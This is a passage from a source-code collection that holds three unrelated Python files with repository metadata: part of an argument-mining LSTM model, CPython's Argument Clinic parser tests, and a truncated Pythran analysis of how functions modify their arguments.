                second_order_potentials, dy.inputVector(second_order_diff))
            # NOTE(review): redundant self-assignment below; harmless.
            second_order_obj = second_order_obj
            obj.append(second_order_obj)
        obj = dy.esum(obj)
        return obj, hamming_loss, max_hamming_loss, status
    # Prepare everything needed before training: feature dims, structure
    # flags, vocabulary, label encoders and network parameters.
    def initialize(self, docs, Y):
        if self.compat_features:
            self.n_compat_features = docs[0].compat_features.shape[1]
        self.coparents_ = self.coparent_layers > 0
        self.grandparents_ = self.grandparent_layers > 0
        self.siblings_ = self.sibling_layers > 0
        self.build_vocab(docs)
        self.initialize_labels(Y)
        self.init_params()
    # Train for up to max_iter epochs; optionally scores on validation
    # data at the epochs listed in score_at_iter (results in self.scores_).
    def fit(self, docs, Y, docs_val=None, Y_val=None):
        self.initialize(docs, Y)
        self.scores_ = []
        if self.score_at_iter:
            score_at_iter = self.score_at_iter
        else:
            score_at_iter = []
        train_time = 0
        for it in range(self.max_iter):
            # evaluate
            if docs_val and it in score_at_iter:
                Y_val_pred = self.predict(docs_val, exact=False)
                val_scores = self._score(Y_val, Y_val_pred)
                self.scores_.append(val_scores)
                with warnings.catch_warnings():
                    warnings.simplefilter('ignore')
                    print("\t\t val link: {:.3f}/{:.3f} Node: {:.3f}/{:.3f} "
                          "accuracy {:.3f}".format(*val_scores))
            docs, Y = shuffle(docs, Y, random_state=0)
            iter_loss = 0
            iter_max_loss = 0
            inference_status = Counter()
            tic = time()
            for doc, y in zip(docs, Y):
                # Skip documents with no propositions.
                if len(y.nodes) == 0:
                    continue
                obj, loss, max_loss, status = self._doc_loss(doc, y)
                inference_status[status] += 1
                iter_loss += loss
                iter_max_loss += max_loss
                # No update when the Hamming loss is (numerically) zero.
                if loss < 1e-9:
                    continue
                # scalar_value() forces the forward pass before backward().
                obj.scalar_value()
                obj.backward()
                self._trainer.update()
            self._trainer.update_epoch()
            self._trainer.status()
            toc = time()
            train_time += toc - tic
            print("Iter {} loss {:.4f}".format(it, iter_loss / iter_max_loss))
            print(", ".join("{:.1f}% {}".format(100 * val / len(docs), key)
                            for key, val in inference_status.most_common()))
            if iter_loss < 1e-9:
                break
        if docs_val and self.max_iter in score_at_iter:
            Y_val_pred = self.predict(docs_val, exact=False)
            val_scores = self._score(Y_val, Y_val_pred)
            self.scores_.append(val_scores)
        # NOTE(review): divides by `it` (last loop index), which is 0 if
        # training stopped in the first epoch -> ZeroDivisionError; also
        # off by one as an epoch count. Confirm intended denominator.
        logging.info("Training time: {:.2f}s/iteration ({:.2f}s/doc-iter)"
                     .format(train_time / it, train_time / (it * len(docs))))
    # Decode every document with the (non-relaxed) inference procedure;
    # `exact=None` falls back to the exact_test setting.
    def predict(self, docs, exact=None):
        if exact is None:
            exact = self.exact_test
        pred = []
        statuses = Counter()
        tic = time()
        for doc in docs:
            dy_potentials = self.build_cg(doc, training=False)
            potentials = self._get_potentials(doc, dy_potentials)
            y_pred, status = self._inference(doc, potentials, relaxed=False,
                                             exact=exact,
                                             constraints=self.constraints)
            pred.append(y_pred)
            statuses[status] += 1
        toc = time()
        logging.info("Prediction time: {:.2f}s/doc".format((toc - tic) /
                                                           len(docs)))
        logging.info("Test inference status: " +
                     ", ".join(
                         "{:.1f}% {}".format(100 * val / len(docs), key)
                         for key, val in statuses.most_common()))
        return pred
class BaselineArgumentLSTM(ArgumentLSTM):
    """Baseline multi-task model with only proposition and link potentials.
    Evaluation is done both directly (argmax) or after decoding with
    constraints, depending on whether constraints == None.
    For code simplicity, AD3 is still called, but decoding should be
    instantaneous without extra constraints.)
    """
    # Same interface as ArgumentLSTM, but with all structured options
    # (class weights, compat features, second-order factors) forced off.
    def __init__(self, max_iter=100, score_at_iter=None, n_embed=128,
                 lstm_layers=2, prop_mlp_layers=2, link_mlp_layers=1,
                 link_bilinear=True, n_lstm=128, n_mlp=128,
                 lstm_dropout=0.0, mlp_dropout=0.1, embeds=None,
                 exact_inference=False, constraints=None,
                 exact_test=False):
        super(BaselineArgumentLSTM, self).__init__(
            max_iter=max_iter, score_at_iter=score_at_iter,
            n_embed=n_embed, lstm_layers=lstm_layers,
            prop_mlp_layers=prop_mlp_layers,
            link_mlp_layers=link_mlp_layers, link_bilinear=link_bilinear,
            n_lstm=n_lstm, n_mlp=n_mlp, lstm_dropout=lstm_dropout,
            mlp_dropout=mlp_dropout, embeds=embeds, class_weight=None,
            exact_inference=exact_inference, compat_features=False,
            constraints=constraints, second_order_multilinear=False,
            coparent_layers=0, grandparent_layers=0, sibling_layers=0,
            exact_test=exact_test)
    # Unstructured multi-task hinge loss: independent hinge terms per
    # proposition and per link; "loss" returned is the number of terms
    # with nonzero hinge (i.e. misclassified under margin).
    def _doc_loss(self, doc, y):
        y_node = self.prop_encoder_.transform(y.nodes)
        y_link = self.link_encoder_.transform(y.links)
        props, links, _, _, _, _ = self.build_cg(doc)
        obj_prop = [dy.hinge(prop, y_) for prop, y_ in zip(props, y_node)]
        obj_link = [dy.hinge(link, y_) for link, y_ in zip(links, y_link)]
        obj = dy.esum(obj_prop) + dy.esum(obj_link)
        correct = sum(1 for val in obj_prop + obj_link
                      if val.scalar_value() == 0)
        max_acc = len(obj_prop + obj_link)
        return obj, max_acc - correct, max_acc, 'n/a'
| {
"repo_name": "vene/marseille",
"path": "marseille/argrnn.py",
"copies": "1",
"size": "26407",
"license": "bsd-3-clause",
"hash": -7546774200757549000,
"line_mean": 36.3507779349,
"line_max": 79,
"alpha_frac": 0.5577687734,
"autogenerated": false,
"ratio": 3.7832378223495704,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48410065957495707,
"avg_score": null,
"num_lines": null
} |
import clinic
from clinic import DSLParser
import collections
import inspect
from test import support
import sys
import unittest
from unittest import TestCase
class FakeConverter:
    """Stand-in converter that just records its name and keyword args."""
    def __init__(self, name, args):
        self.name = name
        self.args = args
class FakeConverterFactory:
    """Callable factory producing FakeConverter objects for one name."""
    def __init__(self, name):
        self.name = name
    def __call__(self, name, default, **kwargs):
        # The factory's own name wins; only keyword args are recorded.
        return FakeConverter(self.name, kwargs)
class FakeConvertersDict:
    """Dict-like registry memoizing one FakeConverterFactory per name."""
    def __init__(self):
        self.used_converters = {}
    def get(self, name, default):
        factory = self.used_converters.setdefault(
            name, FakeConverterFactory(name))
        return factory
# Disable preset loading for all Clinic instances created by these tests.
clinic.Clinic.presets_text = ''
# Module-level Clinic instance (also sets the clinic.clinic global as a
# side effect of Clinic construction — TODO confirm which tests rely on it).
c = clinic.Clinic(language='C')
class FakeClinic:
    """Minimal stand-in for clinic.Clinic used by the parser tests.

    Mirrors the attributes the DSL parser reads (converters, language,
    block parser, destinations, ...) while recording directive calls.
    Constructing one also installs itself as the module-global
    ``clinic.clinic``.
    """
    def __init__(self):
        self.converters = FakeConvertersDict()
        self.legacy_converters = FakeConvertersDict()
        self.language = clinic.CLanguage(None)
        self.filename = None
        self.block_parser = clinic.BlockParser('', self.language)
        self.modules = collections.OrderedDict()
        self.classes = collections.OrderedDict()
        clinic.clinic = self
        self.name = "FakeClinic"
        self.line_prefix = self.line_suffix = ''
        self.destinations = {}
        self.add_destination("block", "buffer")
        self.add_destination("file", "buffer")
        self.add_destination("suppress", "suppress")
        d = self.destinations.get
        self.field_destinations = collections.OrderedDict((
            ('docstring_prototype', d('suppress')),
            ('docstring_definition', d('block')),
            ('methoddef_define', d('block')),
            ('impl_prototype', d('block')),
            ('parser_prototype', d('suppress')),
            ('parser_definition', d('block')),
            ('impl_definition', d('block')),
            ))
        # BUG FIX: directive() below stores into called_directives, but it
        # was never initialized, so the first directive call raised
        # AttributeError.
        self.called_directives = {}
    def get_destination(self, name):
        d = self.destinations.get(name)
        if not d:
            sys.exit("Destination does not exist: " + repr(name))
        return d
    def add_destination(self, name, type, *args):
        if name in self.destinations:
            sys.exit("Destination already exists: " + repr(name))
        self.destinations[name] = clinic.Destination(name, type, self, *args)
    def is_directive(self, name):
        # Only the "module" directive is recognized by this fake.
        return name == "module"
    def directive(self, name, args):
        # Record the directive invocation for later inspection.
        self.called_directives[name] = args
    # Reuse the real implementation for module/class resolution.
    _module_and_class = clinic.Clinic._module_and_class
class ClinicWholeFileTest(TestCase):
    """Tests that run clinic.Clinic.parse over a complete input string."""
    def test_eol(self):
        # regression test:
        # clinic's block parser didn't recognize
        # the "end line" for the block if it
        # didn't end in "\n" (as in, the last)
        # byte of the file was '/'.
        # so it would spit out an end line for you.
        # and since you really already had one,
        # the last line of the block got corrupted.
        c = clinic.Clinic(clinic.CLanguage(None))
        raw = "/*[clinic]\nfoo\n[clinic]*/"
        cooked = c.parse(raw).splitlines()
        end_line = cooked[2].rstrip()
        # this test is redundant, it's just here explicitly to catch
        # the regression test so we don't forget what it looked like
        self.assertNotEqual(end_line, "[clinic]*/[clinic]*/")
        self.assertEqual(end_line, "[clinic]*/")
class ClinicGroupPermuterTest(TestCase):
    """Tests for clinic.permute_optional_groups.

    Each case passes (left optional groups, required args, right optional
    groups) and checks the exact tuple of permutations produced.
    """
    # Helper: assert permute_optional_groups(l, m, r) == output exactly.
    def _test(self, l, m, r, output):
        computed = clinic.permute_optional_groups(l, m, r)
        self.assertEqual(output, computed)
    def test_range(self):
        self._test([['start']], ['stop'], [['step']],
          (
            ('stop',),
            ('start', 'stop',),
            ('start', 'stop', 'step',),
          ))
    def test_add_window(self):
        self._test([['x', 'y']], ['ch'], [['attr']],
          (
            ('ch',),
            ('ch', 'attr'),
            ('x', 'y', 'ch',),
            ('x', 'y', 'ch', 'attr'),
          ))
    def test_ludicrous(self):
        self._test([['a1', 'a2', 'a3'], ['b1', 'b2']], ['c1'], [['d1', 'd2'], ['e1', 'e2', 'e3']],
          (
          ('c1',),
          ('b1', 'b2', 'c1'),
          ('b1', 'b2', 'c1', 'd1', 'd2'),
          ('a1', 'a2', 'a3', 'b1', 'b2', 'c1'),
          ('a1', 'a2', 'a3', 'b1', 'b2', 'c1', 'd1', 'd2'),
          ('a1', 'a2', 'a3', 'b1', 'b2', 'c1', 'd1', 'd2', 'e1', 'e2', 'e3'),
          ))
    def test_right_only(self):
        self._test([], [], [['a'],['b'],['c']],
          (
          (),
          ('a',),
          ('a', 'b'),
          ('a', 'b', 'c')
          ))
    def test_have_left_options_but_required_is_empty(self):
        # Left-side optional groups with no required args are an
        # internal-consistency error (AssertionError).
        def fn():
            clinic.permute_optional_groups(['a'], [], [])
        self.assertRaises(AssertionError, fn)
class ClinicLinearFormatTest(TestCase):
    """Tests for clinic.linear_format template substitution.

    The multiline string literals below are whitespace-significant; the
    {name} placeholder line is replaced by the substitution (or removed
    entirely when the substitution is empty).
    """
    # Helper: assert linear_format(input, **kwargs) == output exactly.
    def _test(self, input, output, **kwargs):
        computed = clinic.linear_format(input, **kwargs)
        self.assertEqual(output, computed)
    def test_empty_strings(self):
        self._test('', '')
    def test_solo_newline(self):
        self._test('\n', '\n')
    def test_no_substitution(self):
        self._test("""
          abc
          """, """
          abc
          """)
    def test_empty_substitution(self):
        self._test("""
          abc
          {name}
          def
          """, """
          abc
          def
          """, name='')
    def test_single_line_substitution(self):
        self._test("""
          abc
          {name}
          def
          """, """
          abc
          GARGLE
          def
          """, name='GARGLE')
    def test_multiline_substitution(self):
        self._test("""
          abc
          {name}
          def
          """, """
          abc
          bingle
          bungle
          def
          """, name='bingle\nbungle\n')
class InertParser:
    """Test double: a block parser that consumes blocks and produces no output."""

    def __init__(self, clinic):
        # Clinic instance accepted only for interface parity with real parsers.
        pass

    def parse(self, block):
        # Deliberately do nothing: the block's output stays untouched.
        pass
class CopyParser:
    """Test double: a block parser whose generated output echoes its input."""

    def __init__(self, clinic):
        # The Clinic instance is accepted only to match the parser interface.
        pass

    def parse(self, block):
        # Generated code is a verbatim copy of the input section.
        block.output = block.input
class ClinicBlockParserTest(TestCase):
    """Tests for BlockParser/BlockPrinter round-tripping of source text."""

    def _test(self, input, output):
        # NOTE(review): the `output` parameter is shadowed below by
        # writer.f.getvalue() and never used as passed in — confirm intent.
        language = clinic.CLanguage(None)
        blocks = list(clinic.BlockParser(input, language))
        writer = clinic.BlockPrinter(language)
        for block in blocks:
            writer.print_block(block)
        output = writer.f.getvalue()
        assert output == input, "output != input!\n\noutput " + repr(output) + "\n\n input " + repr(input)

    def round_trip(self, input):
        # Parsing then printing must reproduce the input exactly.
        return self._test(input, input)

    def test_round_trip_1(self):
        self.round_trip("""
verbatim text here
lah dee dah
""")

    def test_round_trip_2(self):
        self.round_trip("""
verbatim text here
lah dee dah
/*[inert]
abc
[inert]*/
def
/*[inert checksum: 7b18d017f89f61cf17d47f92749ea6930a3f1deb]*/
xyz
""")

    def _test_clinic(self, input, output):
        # Run a full Clinic pass with the two stub parsers installed.
        language = clinic.CLanguage(None)
        c = clinic.Clinic(language)
        c.parsers['inert'] = InertParser(c)
        c.parsers['copy'] = CopyParser(c)
        computed = c.parse(input)
        self.assertEqual(output, computed)

    def test_clinic_1(self):
        # The 'copy' parser replaces the generated section with the input
        # section, and the checksums are updated accordingly.
        self._test_clinic("""
verbatim text here
lah dee dah
/*[copy input]
def
[copy start generated code]*/
abc
/*[copy end generated code: output=03cfd743661f0797 input=7b18d017f89f61cf]*/
xyz
""", """
verbatim text here
lah dee dah
/*[copy input]
def
[copy start generated code]*/
def
/*[copy end generated code: output=7b18d017f89f61cf input=7b18d017f89f61cf]*/
xyz
""")
class ClinicParserTest(TestCase):
    """Tests for the Argument Clinic DSL parser (DSLParser).

    Each test feeds a small DSL block to the parser and checks the resulting
    signatures, parameters, groups, and generated docstrings.  Error cases go
    through parse_function_should_fail, which captures the error text printed
    before SystemExit.
    """

    def test_trivial(self):
        parser = DSLParser(FakeClinic())
        block = clinic.Block("module os\nos.access")
        parser.parse(block)
        module, function = block.signatures
        self.assertEqual("access", function.name)
        self.assertEqual("os", module.name)

    def test_ignore_line(self):
        # A leading '#' line is treated as a comment by the DSL.
        block = self.parse("#\nmodule os\nos.access")
        module, function = block.signatures
        self.assertEqual("access", function.name)
        self.assertEqual("os", module.name)

    def test_param(self):
        function = self.parse_function("module os\nos.access\n path: int")
        self.assertEqual("access", function.name)
        # 2 parameters: the implicit self/module plus 'path'.
        self.assertEqual(2, len(function.parameters))
        p = function.parameters['path']
        self.assertEqual('path', p.name)
        self.assertIsInstance(p.converter, clinic.int_converter)

    def test_param_default(self):
        function = self.parse_function("module os\nos.access\n follow_symlinks: bool = True")
        p = function.parameters['follow_symlinks']
        self.assertEqual(True, p.default)

    def test_param_with_continuations(self):
        # Backslash line continuations inside a parameter declaration.
        function = self.parse_function("module os\nos.access\n follow_symlinks: \\\n bool \\\n =\\\n True")
        p = function.parameters['follow_symlinks']
        self.assertEqual(True, p.default)

    def test_param_default_expression(self):
        # A named-constant default requires an explicit c_default.
        function = self.parse_function("module os\nos.access\n follow_symlinks: int(c_default='MAXSIZE') = sys.maxsize")
        p = function.parameters['follow_symlinks']
        self.assertEqual(sys.maxsize, p.default)
        self.assertEqual("MAXSIZE", p.converter.c_default)
        s = self.parse_function_should_fail("module os\nos.access\n follow_symlinks: int = sys.maxsize")
        self.assertEqual(s, "Error on line 0:\nWhen you specify a named constant ('sys.maxsize') as your default value,\nyou MUST specify a valid c_default.\n")

    def test_param_no_docstring(self):
        function = self.parse_function("""
module os
os.access
follow_symlinks: bool = True
something_else: str = ''""")
        p = function.parameters['follow_symlinks']
        self.assertEqual(3, len(function.parameters))
        self.assertIsInstance(function.parameters['something_else'].converter, clinic.str_converter)

    def test_param_default_parameters_out_of_order(self):
        # A defaultless parameter may not follow one with a default.
        s = self.parse_function_should_fail("""
module os
os.access
follow_symlinks: bool = True
something_else: str""")
        self.assertEqual(s, """Error on line 0:
Can't have a parameter without a default ('something_else')
after a parameter with a default!
""")

    def disabled_test_converter_arguments(self):
        # Disabled: converter keyword arguments (prefix name to re-enable).
        function = self.parse_function("module os\nos.access\n path: path_t(allow_fd=1)")
        p = function.parameters['path']
        self.assertEqual(1, p.converter.args['allow_fd'])

    def test_function_docstring(self):
        function = self.parse_function("""
module os
os.stat as os_stat_fn
path: str
Path to be examined
Perform a stat system call on the given path.""")
        self.assertEqual("""
stat($module, /, path)
--
Perform a stat system call on the given path.
path
Path to be examined
""".strip(), function.docstring)

    def test_explicit_parameters_in_docstring(self):
        function = self.parse_function("""
module foo
foo.bar
x: int
Documentation for x.
y: int
This is the documentation for foo.
Okay, we're done here.
""")
        self.assertEqual("""
bar($module, /, x, y)
--
This is the documentation for foo.
x
Documentation for x.
Okay, we're done here.
""".strip(), function.docstring)

    def test_parser_regression_special_character_in_parameter_column_of_docstring_first_line(self):
        function = self.parse_function("""
module os
os.stat
path: str
This/used to break Clinic!
""")
        self.assertEqual("stat($module, /, path)\n--\n\nThis/used to break Clinic!", function.docstring)

    def test_c_name(self):
        # 'as' clause overrides the generated C function name.
        function = self.parse_function("module os\nos.stat as os_stat_fn")
        self.assertEqual("os_stat_fn", function.c_basename)

    def test_return_converter(self):
        function = self.parse_function("module os\nos.stat -> int")
        self.assertIsInstance(function.return_converter, clinic.int_return_converter)

    def test_star(self):
        # '*' makes subsequent parameters keyword-only.
        function = self.parse_function("module os\nos.access\n *\n follow_symlinks: bool = True")
        p = function.parameters['follow_symlinks']
        self.assertEqual(inspect.Parameter.KEYWORD_ONLY, p.kind)
        self.assertEqual(0, p.group)

    def test_group(self):
        # '[' ... ']' marks an optional group; group numbers count outward.
        function = self.parse_function("module window\nwindow.border\n [\n ls : int\n ]\n /\n")
        p = function.parameters['ls']
        self.assertEqual(1, p.group)

    def test_left_group(self):
        # Groups to the left of required params get negative group numbers.
        function = self.parse_function("""
module curses
curses.addch
[
y: int
Y-coordinate.
x: int
X-coordinate.
]
ch: char
Character to add.
[
attr: long
Attributes for the character.
]
/
""")
        for name, group in (
            ('y', -1), ('x', -1),
            ('ch', 0),
            ('attr', 1),
        ):
            p = function.parameters[name]
            self.assertEqual(p.group, group)
            self.assertEqual(p.kind, inspect.Parameter.POSITIONAL_ONLY)
        self.assertEqual(function.docstring.strip(), """
addch([y, x,] ch, [attr])
y
Y-coordinate.
x
X-coordinate.
ch
Character to add.
attr
Attributes for the character.
""".strip())

    def test_nested_groups(self):
        # Nested groups deepen the magnitude of the group number on each side.
        function = self.parse_function("""
module curses
curses.imaginary
[
[
y1: int
Y-coordinate.
y2: int
Y-coordinate.
]
x1: int
X-coordinate.
x2: int
X-coordinate.
]
ch: char
Character to add.
[
attr1: long
Attributes for the character.
attr2: long
Attributes for the character.
attr3: long
Attributes for the character.
[
attr4: long
Attributes for the character.
attr5: long
Attributes for the character.
attr6: long
Attributes for the character.
]
]
/
""")
        for name, group in (
            ('y1', -2), ('y2', -2),
            ('x1', -1), ('x2', -1),
            ('ch', 0),
            ('attr1', 1), ('attr2', 1), ('attr3', 1),
            ('attr4', 2), ('attr5', 2), ('attr6', 2),
        ):
            p = function.parameters[name]
            self.assertEqual(p.group, group)
            self.assertEqual(p.kind, inspect.Parameter.POSITIONAL_ONLY)
        self.assertEqual(function.docstring.strip(), """
imaginary([[y1, y2,] x1, x2,] ch, [attr1, attr2, attr3, [attr4, attr5,
attr6]])
y1
Y-coordinate.
y2
Y-coordinate.
x1
X-coordinate.
x2
X-coordinate.
ch
Character to add.
attr1
Attributes for the character.
attr2
Attributes for the character.
attr3
Attributes for the character.
attr4
Attributes for the character.
attr5
Attributes for the character.
attr6
Attributes for the character.
""".strip())

    def parse_function_should_fail(self, s):
        # clinic.fail() prints to stdout then raises SystemExit; capture both.
        with support.captured_stdout() as stdout:
            with self.assertRaises(SystemExit):
                self.parse_function(s)
        return stdout.getvalue()

    def test_disallowed_grouping__two_top_groups_on_left(self):
        s = self.parse_function_should_fail("""
module foo
foo.two_top_groups_on_left
[
group1 : int
]
[
group2 : int
]
param: int
""")
        self.assertEqual(s,
            ('Error on line 0:\n'
             'Function two_top_groups_on_left has an unsupported group configuration. (Unexpected state 2.b)\n'))

    def test_disallowed_grouping__two_top_groups_on_right(self):
        self.parse_function_should_fail("""
module foo
foo.two_top_groups_on_right
param: int
[
group1 : int
]
[
group2 : int
]
""")

    def test_disallowed_grouping__parameter_after_group_on_right(self):
        self.parse_function_should_fail("""
module foo
foo.parameter_after_group_on_right
param: int
[
[
group1 : int
]
group2 : int
]
""")

    def test_disallowed_grouping__group_after_parameter_on_left(self):
        self.parse_function_should_fail("""
module foo
foo.group_after_parameter_on_left
[
group2 : int
[
group1 : int
]
]
param: int
""")

    def test_disallowed_grouping__empty_group_on_left(self):
        self.parse_function_should_fail("""
module foo
foo.empty_group
[
[
]
group2 : int
]
param: int
""")

    def test_disallowed_grouping__empty_group_on_right(self):
        self.parse_function_should_fail("""
module foo
foo.empty_group
param: int
[
[
]
group2 : int
]
""")

    def test_no_parameters(self):
        function = self.parse_function("""
module foo
foo.bar
Docstring
""")
        self.assertEqual("bar($module, /)\n--\n\nDocstring", function.docstring)
        self.assertEqual(1, len(function.parameters)) # self!

    def test_init_with_no_parameters(self):
        function = self.parse_function("""
module foo
class foo.Bar "unused" "notneeded"
foo.Bar.__init__
Docstring
""", signatures_in_block=3, function_index=2)
        # self is not in the signature
        self.assertEqual("Bar()\n--\n\nDocstring", function.docstring)
        # but it *is* a parameter
        self.assertEqual(1, len(function.parameters))

    def test_illegal_module_line(self):
        self.parse_function_should_fail("""
module foo
foo.bar => int
/
""")

    def test_illegal_c_basename(self):
        self.parse_function_should_fail("""
module foo
foo.bar as 935
/
""")

    def test_single_star(self):
        # Two '*' markers in one signature are illegal.
        self.parse_function_should_fail("""
module foo
foo.bar
*
*
""")

    def test_parameters_required_after_star_without_initial_parameters_or_docstring(self):
        self.parse_function_should_fail("""
module foo
foo.bar
*
""")

    def test_parameters_required_after_star_without_initial_parameters_with_docstring(self):
        self.parse_function_should_fail("""
module foo
foo.bar
*
Docstring here.
""")

    def test_parameters_required_after_star_with_initial_parameters_without_docstring(self):
        self.parse_function_should_fail("""
module foo
foo.bar
this: int
*
""")

    def test_parameters_required_after_star_with_initial_parameters_and_docstring(self):
        self.parse_function_should_fail("""
module foo
foo.bar
this: int
*
Docstring.
""")

    def test_single_slash(self):
        self.parse_function_should_fail("""
module foo
foo.bar
/
/
""")

    def test_mix_star_and_slash(self):
        self.parse_function_should_fail("""
module foo
foo.bar
x: int
y: int
*
z: int
/
""")

    def test_parameters_not_permitted_after_slash_for_now(self):
        self.parse_function_should_fail("""
module foo
foo.bar
/
x: int
""")

    def test_function_not_at_column_0(self):
        function = self.parse_function("""
module foo
foo.bar
x: int
Nested docstring here, goeth.
*
y: str
Not at column 0!
""")
        self.assertEqual("""
bar($module, /, x, *, y)
--
Not at column 0!
x
Nested docstring here, goeth.
""".strip(), function.docstring)

    def test_directive(self):
        # A bare directive name in a block invokes the registered callable.
        c = FakeClinic()
        parser = DSLParser(c)
        parser.flag = False
        parser.directives['setflag'] = lambda : setattr(parser, 'flag', True)
        block = clinic.Block("setflag")
        parser.parse(block)
        self.assertTrue(parser.flag)

    def test_legacy_converters(self):
        # Quoted one-letter format codes map to the legacy converters.
        block = self.parse('module os\nos.access\n path: "s"')
        module, function = block.signatures
        self.assertIsInstance((function.parameters['path']).converter, clinic.str_converter)

    def parse(self, text):
        # Helper: parse `text` as a DSL block against a fresh FakeClinic.
        c = FakeClinic()
        parser = DSLParser(c)
        block = clinic.Block(text)
        parser.parse(block)
        return block

    def parse_function(self, text, signatures_in_block=2, function_index=1):
        # Helper: parse and return the Function signature from the block.
        block = self.parse(text)
        s = block.signatures
        self.assertEqual(len(s), signatures_in_block)
        assert isinstance(s[0], clinic.Module)
        assert isinstance(s[function_index], clinic.Function)
        return s[function_index]

    def test_scaffolding(self):
        # test repr on special values
        self.assertEqual(repr(clinic.unspecified), '<Unspecified>')
        self.assertEqual(repr(clinic.NULL), '<Null>')
        # test that fail fails
        with support.captured_stdout() as stdout:
            with self.assertRaises(SystemExit):
                clinic.fail('The igloos are melting!', filename='clown.txt', line_number=69)
        self.assertEqual(stdout.getvalue(), 'Error in file "clown.txt" on line 69:\nThe igloos are melting!\n')
# Run the whole test suite when executed as a script.
if __name__ == "__main__":
    unittest.main()
| {
"repo_name": "batermj/algorithm-challenger",
"path": "code-analysis/programming_anguage/python/source_codes/Python3.5.9/Python-3.5.9/Tools/clinic/clinic_test.py",
"copies": "3",
"size": "20753",
"license": "apache-2.0",
"hash": 6013575597823115000,
"line_mean": 25.2364096081,
"line_max": 160,
"alpha_frac": 0.5894087602,
"autogenerated": false,
"ratio": 3.602325985072036,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.001415779074329627,
"num_lines": 791
} |
""" ArgumentEffects computes write effect on arguments. """
from pythran.analyses.aliases import Aliases
from pythran.analyses.global_declarations import GlobalDeclarations
from pythran.passmanager import ModuleAnalysis
from pythran.tables import MODULES
# FIXME: investigate why we need to import it that way
from pythran import intrinsic
import gast as ast
import networkx as nx
from functools import reduce
class FunctionEffects(object):
    """Per-function record of which arguments a call may update (mutate).

    update_effects[i] is True when argument i can be modified by the call.
    """

    def __init__(self, node):
        self.func = node
        if isinstance(node, ast.FunctionDef):
            # User code: assume pure until the analysis proves otherwise.
            self.update_effects = [False] * len(node.args.args)
        elif isinstance(node, intrinsic.Intrinsic):
            # Builtins declare their effects explicitly in the tables.
            self.update_effects = [isinstance(x, intrinsic.UpdateEffect)
                                   for x in node.argument_effects]
        elif isinstance(node, ast.alias):
            # Imported alias: no argument list of its own.
            self.update_effects = []
        elif isinstance(node, intrinsic.Class):
            self.update_effects = []
        else:
            raise NotImplementedError
# Compute the intrinsic effects only once
IntrinsicArgumentEffects = {}


def save_function_effect(module):
    """ Recursively save function effect for pythonic functions. """
    for intr in module.values():
        if isinstance(intr, dict):  # Submodule case
            save_function_effect(intr)
        else:
            fe = FunctionEffects(intr)
            IntrinsicArgumentEffects[intr] = fe
            if isinstance(intr, intrinsic.Class):
                # Class methods live in .fields; record them too.
                save_function_effect(intr.fields)


# Populate the table for every registered builtin module at import time.
for module in MODULES.values():
    save_function_effect(module)
class ArgumentEffects(ModuleAnalysis):
    """Gathers inter-procedural effects on function arguments.

    Builds a call graph whose nodes are FunctionEffects and whose edges carry
    the mapping between the caller's argument indices and the callee's formal
    parameter indices, then propagates update effects to a fixed point.
    """

    def __init__(self):
        # Call graph: edge u -> v means u passes one of its arguments to v.
        self.result = nx.DiGraph()
        self.node_to_functioneffect = IntrinsicArgumentEffects.copy()
        for fe in IntrinsicArgumentEffects.values():
            self.result.add_node(fe)
        super(ArgumentEffects, self).__init__(Aliases, GlobalDeclarations)

    def prepare(self, node):
        """
        Initialise arguments effects as this analyse is inter-procedural.
        Initialisation done for Pythonic functions and default value set for
        user defined functions.
        """
        super(ArgumentEffects, self).prepare(node)
        for n in self.global_declarations.values():
            fe = FunctionEffects(n)
            self.node_to_functioneffect[n] = fe
            self.result.add_node(fe)

    def run(self, node):
        # Fixed-point iteration: whenever a callee's parameter is found to be
        # updated, the caller's corresponding argument is marked too, and the
        # caller is re-queued for another pass.
        result = super(ArgumentEffects, self).run(node)
        candidates = set(result)
        while candidates:
            function = candidates.pop()
            for ue in enumerate(function.update_effects):
                update_effect_idx, update_effect = ue
                if not update_effect:
                    continue
                for pred in result.predecessors(function):
                    edge = result.edges[pred, function]
                    for fp in enumerate(edge["formal_parameters"]):
                        i, formal_parameter_idx = fp
                        # propagate the impurity backward if needed.
                        # Afterward we may need another graph iteration
                        ith_effectiv = edge["effective_parameters"][i]
                        if (formal_parameter_idx == update_effect_idx and
                                not pred.update_effects[ith_effectiv]):
                            pred.update_effects[ith_effectiv] = True
                            candidates.add(pred)
        # Final shape: AST function node -> list of per-argument booleans.
        self.result = {f.func: f.update_effects for f in result}
        return self.result

    def argument_index(self, node):
        # Strip subscripts so that e.g. a[i][j] maps back to the argument a.
        while isinstance(node, ast.Subscript):
            node = node.value
        for node_alias in self.aliases[node]:
            while isinstance(node_alias, ast.Subscript):
                node_alias = node_alias.value
            if node_alias in self.current_arguments:
                return self.current_arguments[node_alias]
            if node_alias in self.current_subscripted_arguments:
                return self.current_subscripted_arguments[node_alias]
        # Not an alias of any current argument.
        return -1

    def visit_FunctionDef(self, node):
        self.current_function = self.node_to_functioneffect[node]
        self.current_arguments = {arg: i
                                  for i, arg
                                  in enumerate(node.args.args)}
        # Loop targets iterating over an argument (see visit_For).
        self.current_subscripted_arguments = dict()
        assert self.current_function in self.result
        self.generic_visit(node)

    def visit_For(self, node):
        # `for x in arg:` — mutating x may mutate arg's elements.
        ai = self.argument_index(node.iter)
        if ai >= 0:
            self.current_subscripted_arguments[node.target] = ai
        self.generic_visit(node)

    def visit_AugAssign(self, node):
        # `arg += ...` updates the argument in place.
        n = self.argument_index(node.target)
        if n >= 0:
            self.current_function.update_effects[n] = True
        self.generic_visit(node)

    def visit_Assign(self, node):
        # Only subscript assignment (`arg[i] = ...`) mutates the argument;
        # rebinding a plain name does not.
        for t in node.targets:
            if isinstance(t, ast.Subscript):
                n = self.argument_index(t)
                if n >= 0:
                    self.current_function.update_effects[n] = True
        self.generic_visit(node)

    def visit_Call(self, node):
        # Record, for every argument of ours passed into a call, an edge to
        # each possible callee so run() can propagate the callee's effects.
        for i, arg in enumerate(node.args):
            n = self.argument_index(arg)
            if n >= 0:
                func_aliases = self.aliases[node.func]
                # pessimistic case: no alias found
                if func_aliases is None:
                    self.current_function.update_effects[n] = True
                    continue
                # expand argument if any
                func_aliases = reduce(
                    lambda x, y: x + (
                        # all functions
                        list(self.node_to_functioneffect.keys())
                        if (isinstance(y, ast.Name) and
                            self.argument_index(y) >= 0)
                        else [y]),
                    func_aliases,
                    list())
                for func_alias in func_aliases:
                    # special hook for binded functions
                    if isinstance(func_alias, ast.Call):
